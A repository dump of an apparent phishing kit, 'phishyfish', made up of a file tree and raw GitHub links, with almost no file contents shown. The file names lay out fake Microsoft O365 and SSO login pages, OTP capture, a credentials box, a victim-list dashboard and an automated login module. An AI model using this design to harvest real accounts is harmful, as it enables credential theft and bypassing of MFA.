├── README.md ├── api ├── .gitignore ├── Dockerfile ├── __int__.py ├── crud.py ├── database.py ├── example.config.json ├── main.py ├── models.py ├── modules │ ├── auto_login.py │ └── auto_login_playwright.py ├── requirements.txt ├── schemas.py └── utils.py ├── caddy ├── .gitignore └── Caddyfile_template ├── compose.yml ├── dev_prep.sh ├── leet_frontend ├── .gitignore ├── .vscode │ └── launch.json ├── Dockerfile ├── README.md ├── example.env.local ├── jsconfig.json ├── next.config.js ├── package-lock.json ├── package.json ├── pages │ ├── _app.js │ ├── _document.js │ ├── components │ │ ├── ConfigView.jsx │ │ ├── GeneralInfo.jsx │ │ ├── Login.jsx │ │ ├── VictimCard.jsx │ │ └── Victimlst.jsx │ └── index.js ├── postcss.config.js ├── public │ └── favicon.ico ├── styles │ └── globals.css └── tailwind.config.js ├── start.sh └── user_frontend ├── SSO_integration ├── .gitignore ├── Dockerfile ├── README.md ├── example.env.local ├── jsconfig.json ├── next.config.js ├── package-lock.json ├── package.json ├── pages │ ├── OTP │ │ ├── components │ │ │ ├── Error.jsx │ │ │ ├── Invalid.jsx │ │ │ ├── OTP.jsx │ │ │ ├── OTP2.jsx │ │ │ └── Wait.jsx │ │ └── index.js │ ├── _app.js │ ├── _document.js │ ├── components │ │ ├── Blocked_page.jsx │ │ ├── CredsBox.jsx │ │ └── Login.jsx │ └── index.js ├── postcss.config.js ├── public │ ├── favicon.ico │ ├── picker_verify_fluent_authenticator.png │ └── picker_verify_fluent_authenticator.svg ├── styles │ └── globals.css └── tailwind.config.js └── o365 ├── .gitignore ├── Dockerfile ├── README.md ├── example.env.local ├── jsconfig.json ├── next.config.js ├── package-lock.json ├── package.json ├── pages ├── HackerMan │ └── index.js ├── Home │ └── index.js ├── OTP │ ├── components │ │ ├── Error.jsx │ │ ├── Invalid.jsx │ │ ├── OTP.jsx │ │ ├── OTP2.jsx │ │ ├── Timeout.jsx │ │ └── Wait.jsx │ └── index.js ├── [slug].js ├── _app.js ├── _document.js ├── components │ ├── Blocked_checker.jsx │ ├── CredsBox.jsx │ ├── Login.jsx │ └── block_page.jsx └── index.js ├── postcss.config.js ├── public ├── Hacker_video.webm ├── Microsoft-logo.png ├── app.css ├── app.js ├── arrow.svg ├── back.png ├── background.svg ├── company_background.jpeg ├── company_logo.png ├── favicon.ico ├── key.png ├── picker_account.svg ├── picker_account_add.svg ├── picker_more.svg ├── picker_verify_fluent_authenticator.png ├── picker_verify_fluent_authenticator.svg ├── question.png └── signin-options.svg ├── styles ├── SignIn.module.css └── globals.css └── tailwind.config.js /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/README.md -------------------------------------------------------------------------------- /api/.gitignore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/api/.gitignore -------------------------------------------------------------------------------- /api/Dockerfile: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/api/Dockerfile -------------------------------------------------------------------------------- /api/__int__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /api/crud.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/api/crud.py -------------------------------------------------------------------------------- /api/database.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/api/database.py -------------------------------------------------------------------------------- /api/example.config.json: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/api/example.config.json -------------------------------------------------------------------------------- /api/main.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/api/main.py -------------------------------------------------------------------------------- /api/models.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/api/models.py -------------------------------------------------------------------------------- /api/modules/auto_login.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /api/modules/auto_login_playwright.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/api/modules/auto_login_playwright.py -------------------------------------------------------------------------------- /api/requirements.txt: -------------------------------------------------------------------------------- 1 | fastapi 2 | sqlalchemy 3 | uvicorn 4 | requests 5 | pytest-playwright 6 | 7 | -------------------------------------------------------------------------------- /api/schemas.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/api/schemas.py -------------------------------------------------------------------------------- /api/utils.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/api/utils.py -------------------------------------------------------------------------------- /caddy/.gitignore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/caddy/.gitignore -------------------------------------------------------------------------------- /caddy/Caddyfile_template: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/caddy/Caddyfile_template -------------------------------------------------------------------------------- /compose.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/compose.yml -------------------------------------------------------------------------------- /dev_prep.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/dev_prep.sh -------------------------------------------------------------------------------- /leet_frontend/.gitignore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/leet_frontend/.gitignore -------------------------------------------------------------------------------- /leet_frontend/.vscode/launch.json: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/leet_frontend/.vscode/launch.json -------------------------------------------------------------------------------- /leet_frontend/Dockerfile: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/leet_frontend/Dockerfile -------------------------------------------------------------------------------- /leet_frontend/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/leet_frontend/README.md -------------------------------------------------------------------------------- /leet_frontend/example.env.local: -------------------------------------------------------------------------------- 1 | API_URL="https://DOMAIN_PLACEHOLDER/api" -------------------------------------------------------------------------------- /leet_frontend/jsconfig.json: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/leet_frontend/jsconfig.json -------------------------------------------------------------------------------- /leet_frontend/next.config.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/leet_frontend/next.config.js -------------------------------------------------------------------------------- /leet_frontend/package-lock.json: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/leet_frontend/package-lock.json -------------------------------------------------------------------------------- /leet_frontend/package.json: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/leet_frontend/package.json -------------------------------------------------------------------------------- /leet_frontend/pages/_app.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/leet_frontend/pages/_app.js -------------------------------------------------------------------------------- /leet_frontend/pages/_document.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/leet_frontend/pages/_document.js -------------------------------------------------------------------------------- /leet_frontend/pages/components/ConfigView.jsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/leet_frontend/pages/components/ConfigView.jsx -------------------------------------------------------------------------------- /leet_frontend/pages/components/GeneralInfo.jsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/leet_frontend/pages/components/GeneralInfo.jsx -------------------------------------------------------------------------------- /leet_frontend/pages/components/Login.jsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/leet_frontend/pages/components/Login.jsx -------------------------------------------------------------------------------- /leet_frontend/pages/components/VictimCard.jsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/leet_frontend/pages/components/VictimCard.jsx -------------------------------------------------------------------------------- /leet_frontend/pages/components/Victimlst.jsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/leet_frontend/pages/components/Victimlst.jsx -------------------------------------------------------------------------------- /leet_frontend/pages/index.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/leet_frontend/pages/index.js -------------------------------------------------------------------------------- /leet_frontend/postcss.config.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/leet_frontend/postcss.config.js -------------------------------------------------------------------------------- /leet_frontend/public/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/leet_frontend/public/favicon.ico -------------------------------------------------------------------------------- /leet_frontend/styles/globals.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/leet_frontend/styles/globals.css -------------------------------------------------------------------------------- /leet_frontend/tailwind.config.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/leet_frontend/tailwind.config.js -------------------------------------------------------------------------------- /start.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/start.sh -------------------------------------------------------------------------------- /user_frontend/SSO_integration/.gitignore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/SSO_integration/.gitignore -------------------------------------------------------------------------------- /user_frontend/SSO_integration/Dockerfile: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/SSO_integration/Dockerfile -------------------------------------------------------------------------------- /user_frontend/SSO_integration/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/SSO_integration/README.md -------------------------------------------------------------------------------- /user_frontend/SSO_integration/example.env.local: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/SSO_integration/example.env.local -------------------------------------------------------------------------------- /user_frontend/SSO_integration/jsconfig.json: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/SSO_integration/jsconfig.json -------------------------------------------------------------------------------- /user_frontend/SSO_integration/next.config.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/SSO_integration/next.config.js -------------------------------------------------------------------------------- /user_frontend/SSO_integration/package-lock.json: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/SSO_integration/package-lock.json -------------------------------------------------------------------------------- /user_frontend/SSO_integration/package.json: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/SSO_integration/package.json -------------------------------------------------------------------------------- /user_frontend/SSO_integration/pages/OTP/components/Error.jsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/SSO_integration/pages/OTP/components/Error.jsx -------------------------------------------------------------------------------- /user_frontend/SSO_integration/pages/OTP/components/Invalid.jsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/SSO_integration/pages/OTP/components/Invalid.jsx -------------------------------------------------------------------------------- /user_frontend/SSO_integration/pages/OTP/components/OTP.jsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/SSO_integration/pages/OTP/components/OTP.jsx -------------------------------------------------------------------------------- /user_frontend/SSO_integration/pages/OTP/components/OTP2.jsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/SSO_integration/pages/OTP/components/OTP2.jsx -------------------------------------------------------------------------------- /user_frontend/SSO_integration/pages/OTP/components/Wait.jsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/SSO_integration/pages/OTP/components/Wait.jsx -------------------------------------------------------------------------------- /user_frontend/SSO_integration/pages/OTP/index.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/SSO_integration/pages/OTP/index.js -------------------------------------------------------------------------------- /user_frontend/SSO_integration/pages/_app.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/SSO_integration/pages/_app.js -------------------------------------------------------------------------------- /user_frontend/SSO_integration/pages/_document.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/SSO_integration/pages/_document.js -------------------------------------------------------------------------------- /user_frontend/SSO_integration/pages/components/Blocked_page.jsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/SSO_integration/pages/components/Blocked_page.jsx -------------------------------------------------------------------------------- /user_frontend/SSO_integration/pages/components/CredsBox.jsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/SSO_integration/pages/components/CredsBox.jsx -------------------------------------------------------------------------------- /user_frontend/SSO_integration/pages/components/Login.jsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/SSO_integration/pages/components/Login.jsx -------------------------------------------------------------------------------- /user_frontend/SSO_integration/pages/index.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/SSO_integration/pages/index.js -------------------------------------------------------------------------------- /user_frontend/SSO_integration/postcss.config.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/SSO_integration/postcss.config.js -------------------------------------------------------------------------------- /user_frontend/SSO_integration/public/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/SSO_integration/public/favicon.ico -------------------------------------------------------------------------------- /user_frontend/SSO_integration/public/picker_verify_fluent_authenticator.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/SSO_integration/public/picker_verify_fluent_authenticator.png -------------------------------------------------------------------------------- /user_frontend/SSO_integration/public/picker_verify_fluent_authenticator.svg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/SSO_integration/public/picker_verify_fluent_authenticator.svg -------------------------------------------------------------------------------- /user_frontend/SSO_integration/styles/globals.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/SSO_integration/styles/globals.css -------------------------------------------------------------------------------- /user_frontend/SSO_integration/tailwind.config.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/SSO_integration/tailwind.config.js -------------------------------------------------------------------------------- /user_frontend/o365/.gitignore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/.gitignore -------------------------------------------------------------------------------- /user_frontend/o365/Dockerfile: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/Dockerfile -------------------------------------------------------------------------------- /user_frontend/o365/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/README.md -------------------------------------------------------------------------------- /user_frontend/o365/example.env.local: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/example.env.local -------------------------------------------------------------------------------- /user_frontend/o365/jsconfig.json: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/jsconfig.json -------------------------------------------------------------------------------- /user_frontend/o365/next.config.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/next.config.js -------------------------------------------------------------------------------- /user_frontend/o365/package-lock.json: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/package-lock.json -------------------------------------------------------------------------------- /user_frontend/o365/package.json: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/package.json -------------------------------------------------------------------------------- /user_frontend/o365/pages/HackerMan/index.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/pages/HackerMan/index.js -------------------------------------------------------------------------------- /user_frontend/o365/pages/Home/index.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/pages/Home/index.js -------------------------------------------------------------------------------- /user_frontend/o365/pages/OTP/components/Error.jsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/pages/OTP/components/Error.jsx -------------------------------------------------------------------------------- /user_frontend/o365/pages/OTP/components/Invalid.jsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/pages/OTP/components/Invalid.jsx -------------------------------------------------------------------------------- /user_frontend/o365/pages/OTP/components/OTP.jsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/pages/OTP/components/OTP.jsx -------------------------------------------------------------------------------- /user_frontend/o365/pages/OTP/components/OTP2.jsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/pages/OTP/components/OTP2.jsx -------------------------------------------------------------------------------- /user_frontend/o365/pages/OTP/components/Timeout.jsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/pages/OTP/components/Timeout.jsx -------------------------------------------------------------------------------- /user_frontend/o365/pages/OTP/components/Wait.jsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/pages/OTP/components/Wait.jsx -------------------------------------------------------------------------------- /user_frontend/o365/pages/OTP/index.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/pages/OTP/index.js -------------------------------------------------------------------------------- /user_frontend/o365/pages/[slug].js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/pages/[slug].js -------------------------------------------------------------------------------- /user_frontend/o365/pages/_app.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/pages/_app.js -------------------------------------------------------------------------------- /user_frontend/o365/pages/_document.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/pages/_document.js -------------------------------------------------------------------------------- /user_frontend/o365/pages/components/Blocked_checker.jsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/pages/components/Blocked_checker.jsx -------------------------------------------------------------------------------- /user_frontend/o365/pages/components/CredsBox.jsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/pages/components/CredsBox.jsx -------------------------------------------------------------------------------- /user_frontend/o365/pages/components/Login.jsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/pages/components/Login.jsx -------------------------------------------------------------------------------- /user_frontend/o365/pages/components/block_page.jsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/pages/components/block_page.jsx -------------------------------------------------------------------------------- /user_frontend/o365/pages/index.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/pages/index.js -------------------------------------------------------------------------------- /user_frontend/o365/postcss.config.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/postcss.config.js -------------------------------------------------------------------------------- /user_frontend/o365/public/Hacker_video.webm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/public/Hacker_video.webm -------------------------------------------------------------------------------- /user_frontend/o365/public/Microsoft-logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/public/Microsoft-logo.png -------------------------------------------------------------------------------- /user_frontend/o365/public/app.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/public/app.css -------------------------------------------------------------------------------- /user_frontend/o365/public/app.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/public/app.js -------------------------------------------------------------------------------- /user_frontend/o365/public/arrow.svg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/public/arrow.svg -------------------------------------------------------------------------------- /user_frontend/o365/public/back.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/public/back.png -------------------------------------------------------------------------------- /user_frontend/o365/public/background.svg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/public/background.svg -------------------------------------------------------------------------------- /user_frontend/o365/public/company_background.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/public/company_background.jpeg -------------------------------------------------------------------------------- /user_frontend/o365/public/company_logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/public/company_logo.png -------------------------------------------------------------------------------- /user_frontend/o365/public/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/public/favicon.ico -------------------------------------------------------------------------------- /user_frontend/o365/public/key.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/public/key.png -------------------------------------------------------------------------------- /user_frontend/o365/public/picker_account.svg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/public/picker_account.svg -------------------------------------------------------------------------------- /user_frontend/o365/public/picker_account_add.svg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/public/picker_account_add.svg -------------------------------------------------------------------------------- /user_frontend/o365/public/picker_more.svg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/public/picker_more.svg -------------------------------------------------------------------------------- /user_frontend/o365/public/picker_verify_fluent_authenticator.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/public/picker_verify_fluent_authenticator.png -------------------------------------------------------------------------------- /user_frontend/o365/public/picker_verify_fluent_authenticator.svg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/public/picker_verify_fluent_authenticator.svg -------------------------------------------------------------------------------- /user_frontend/o365/public/question.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/public/question.png -------------------------------------------------------------------------------- /user_frontend/o365/public/signin-options.svg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/public/signin-options.svg -------------------------------------------------------------------------------- /user_frontend/o365/styles/SignIn.module.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/styles/SignIn.module.css -------------------------------------------------------------------------------- /user_frontend/o365/styles/globals.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/styles/globals.css -------------------------------------------------------------------------------- /user_frontend/o365/tailwind.config.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xb11a1/phishyfish/HEAD/user_frontend/o365/tailwind.config.js --------------------------------------------------------------------------------